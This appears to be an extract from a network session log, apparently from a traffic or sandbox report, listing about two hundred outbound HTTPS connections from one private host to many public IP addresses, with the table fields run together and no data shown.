                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15007192.168.2.135050467.123.155.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15008192.168.2.1334280204.89.158.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15009192.168.2.1356888104.3.44.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15010192.168.2.134515685.163.76.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15011192.168.2.134861863.180.180.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15012192.168.2.135386853.94.202.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15013192.168.2.1348842103.44.51.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15014192.168.2.1352058128.167.0.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15015192.168.2.1354654115.59.52.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15016192.168.2.1354978146.24.18.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15017192.168.2.1349790157.171.176.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15018192.168.2.1338572155.67.251.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15019192.168.2.135324266.52.197.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15020192.168.2.1346686210.175.56.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15021192.168.2.134823212.196.42.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15022192.168.2.133638683.75.43.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15023192.168.2.1351036172.143.193.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15024192.168.2.135187617.90.72.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15025192.168.2.1359402180.173.194.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15026192.168.2.134205085.137.220.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15027192.168.2.1341032114.215.15.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15028192.168.2.134350680.34.158.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15029192.168.2.1346640185.116.57.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15030192.168.2.134405440.169.80.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15031192.168.2.1340198126.141.146.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15032192.168.2.135064666.63.86.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15033192.168.2.1359334165.88.182.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15034192.168.2.134748818.158.129.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15035192.168.2.1352386107.22.141.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15036192.168.2.1343576128.216.196.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15037192.168.2.1353826162.35.26.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15038192.168.2.134737059.128.43.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15039192.168.2.1337402163.40.188.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15040192.168.2.1340894220.24.188.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15041192.168.2.1355126210.117.232.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15042192.168.2.1353518121.213.76.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15043192.168.2.133402613.103.88.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15044192.168.2.135184864.117.32.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15045192.168.2.1340474132.55.166.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15046192.168.2.135475073.6.46.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15047192.168.2.135181291.146.61.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15048192.168.2.1341096122.92.159.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15049192.168.2.1350352175.58.190.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15050192.168.2.13470802.113.162.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15051192.168.2.1334140160.16.170.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15052192.168.2.1347848199.142.25.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15053192.168.2.1351786190.249.73.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15054192.168.2.1350134184.187.9.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15055192.168.2.133591037.28.118.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15056192.168.2.1340896220.5.241.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15057192.168.2.1348222115.111.223.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15058192.168.2.1339490208.47.119.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15059192.168.2.135256462.100.28.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15060192.168.2.1334852140.151.206.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15061192.168.2.135090446.235.220.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15062192.168.2.134981037.56.42.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15063192.168.2.1355558117.72.119.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15064192.168.2.133862482.65.236.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15065192.168.2.1349644216.248.54.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15066192.168.2.1354892173.149.124.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15067192.168.2.135335454.66.90.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15068192.168.2.13399285.83.180.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15069192.168.2.135565892.4.45.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15070192.168.2.13439408.250.227.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15071192.168.2.1337836207.110.171.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15072192.168.2.135376669.72.82.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15073192.168.2.135536282.177.247.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15074192.168.2.134603641.255.237.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15075192.168.2.133313872.72.221.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15076192.168.2.1356626115.38.45.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15077192.168.2.135926861.190.115.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15078192.168.2.133538882.224.170.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15079192.168.2.1333854137.179.62.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15080192.168.2.135288648.243.38.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15081192.168.2.1347368126.105.231.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15082192.168.2.1341468128.95.233.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15083192.168.2.135133065.36.100.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15084192.168.2.1343844132.107.127.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15085192.168.2.135792653.128.169.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15086192.168.2.1335416121.27.209.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15087192.168.2.135294693.89.140.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15088192.168.2.1333614107.201.207.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15089192.168.2.1340412126.210.140.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15090192.168.2.1356992153.198.184.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15091192.168.2.134194672.74.235.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15092192.168.2.134086690.82.254.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15093192.168.2.1355888147.22.90.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15094192.168.2.1343002168.211.131.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15095192.168.2.1346746117.114.255.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15096192.168.2.1344998152.163.8.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15097192.168.2.1338504118.154.83.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15098192.168.2.1350692195.180.160.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15099192.168.2.1347768184.90.91.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15100192.168.2.134790224.84.76.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15101192.168.2.134085681.28.3.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15102192.168.2.134049224.79.164.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15103192.168.2.1358940206.36.205.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15104192.168.2.1354214169.104.138.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15105192.168.2.134173637.158.118.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15106192.168.2.134581888.206.118.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15107192.168.2.1338474159.165.202.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15108192.168.2.13595909.99.62.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15109192.168.2.1346772154.164.176.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15110192.168.2.135986060.114.64.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15111192.168.2.135257081.90.238.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15112192.168.2.1341114204.160.207.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15113192.168.2.13366948.210.232.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15114192.168.2.1341238140.242.202.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15115192.168.2.1351054220.38.70.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15116192.168.2.134544832.165.26.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15117192.168.2.1355620194.123.138.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15118192.168.2.134782687.249.150.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15119192.168.2.1338694193.150.120.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15120192.168.2.1356888176.4.229.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15121192.168.2.135212895.22.205.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15122192.168.2.134658898.81.174.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15123192.168.2.134147069.38.120.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15124192.168.2.1339794172.255.209.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15125192.168.2.1338040111.144.52.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15126192.168.2.134535624.35.232.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15127192.168.2.1333938180.114.168.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15128192.168.2.134957444.163.242.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15129192.168.2.134823834.177.141.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15130192.168.2.133667642.137.123.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15131192.168.2.134307449.134.171.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15132192.168.2.1336772190.79.19.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15133192.168.2.134763073.20.183.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15134192.168.2.134311453.193.199.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15135192.168.2.1357450174.252.199.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15136192.168.2.13387644.44.162.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15137192.168.2.1333944191.150.3.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15138192.168.2.1344342143.150.204.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15139192.168.2.133375050.24.166.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15140192.168.2.1336804173.59.187.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15141192.168.2.1341016124.133.220.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15142192.168.2.1340978198.2.32.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15143192.168.2.135302813.167.192.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15144192.168.2.135373044.190.179.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15145192.168.2.1349798105.46.14.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15146192.168.2.135513027.196.161.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15147192.168.2.1349628150.253.18.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15148192.168.2.1338120211.182.34.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15149192.168.2.135862650.66.138.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15150192.168.2.13365464.239.77.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15151192.168.2.1356516179.214.75.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15152192.168.2.1339642206.83.152.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15153192.168.2.1352746130.15.182.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15154192.168.2.134291043.149.100.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15155192.168.2.1351040189.169.13.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15156192.168.2.1336060136.92.119.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15157192.168.2.1347880145.52.249.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15158192.168.2.135381439.46.31.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15159192.168.2.133330295.140.36.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15160192.168.2.1348882173.165.148.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15161192.168.2.133603825.137.81.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15162192.168.2.1358132213.146.12.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15163192.168.2.134421688.228.215.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15164192.168.2.1336110153.241.187.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15165192.168.2.1353766143.213.0.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15166192.168.2.1340810130.215.252.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15167192.168.2.135533860.245.6.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15168192.168.2.1350420213.94.2.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15169192.168.2.1353068109.81.193.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15170192.168.2.1346776120.5.31.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15171192.168.2.1359448124.209.131.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15172192.168.2.1353510116.154.245.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15173192.168.2.1350500180.41.119.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15174192.168.2.135617276.243.218.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15175192.168.2.1333676213.169.79.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15176192.168.2.13520224.6.248.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15177192.168.2.1339400182.152.0.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15178192.168.2.135295053.103.147.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15179192.168.2.1334610141.253.111.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15180192.168.2.135871264.106.241.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15181192.168.2.134960831.227.11.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15182192.168.2.1358188105.216.36.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15183192.168.2.1346246155.245.71.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15184192.168.2.1357034101.194.104.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15185192.168.2.1346770182.226.20.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15186192.168.2.135160618.185.133.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15187192.168.2.1351386187.243.51.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15188192.168.2.1342334164.200.81.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15189192.168.2.134502436.81.99.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15190192.168.2.133278027.243.221.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15191192.168.2.1358582134.222.253.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15192192.168.2.135804253.6.7.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15193192.168.2.1349672160.189.236.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15194192.168.2.1343138111.199.233.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15195192.168.2.135814219.71.11.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15196192.168.2.133714488.205.99.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15197192.168.2.134960847.206.33.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15198192.168.2.1348220137.143.133.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15199192.168.2.1353516223.183.49.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15200192.168.2.1351388159.248.221.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15201192.168.2.133870088.174.172.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15202192.168.2.1345976189.253.15.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15203192.168.2.1348394126.56.195.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15204192.168.2.1339582178.229.2.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15205192.168.2.133651263.249.202.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15206192.168.2.134908246.50.253.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15207192.168.2.1340984106.225.180.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15208192.168.2.1347378117.44.115.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15209192.168.2.1358904172.229.119.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15210192.168.2.1356548184.127.21.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15211192.168.2.1340764199.225.144.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15212192.168.2.134321072.9.250.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15213192.168.2.13559028.187.17.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15214192.168.2.1338578151.196.27.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15215192.168.2.134421290.234.105.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15216192.168.2.135114244.0.98.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15217192.168.2.1356856206.198.32.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15218192.168.2.134228246.0.74.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15219192.168.2.134518471.63.77.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15220192.168.2.1345396144.210.36.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15221192.168.2.1355674184.107.81.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15222192.168.2.1346808156.20.129.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15223192.168.2.1334438118.119.113.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15224192.168.2.134862446.231.173.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15225192.168.2.135853819.137.156.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15226192.168.2.1338480148.72.34.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15227192.168.2.1337228148.36.104.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15228192.168.2.1336728193.174.227.41443
                                    TimestampBytes transferredDirectionData


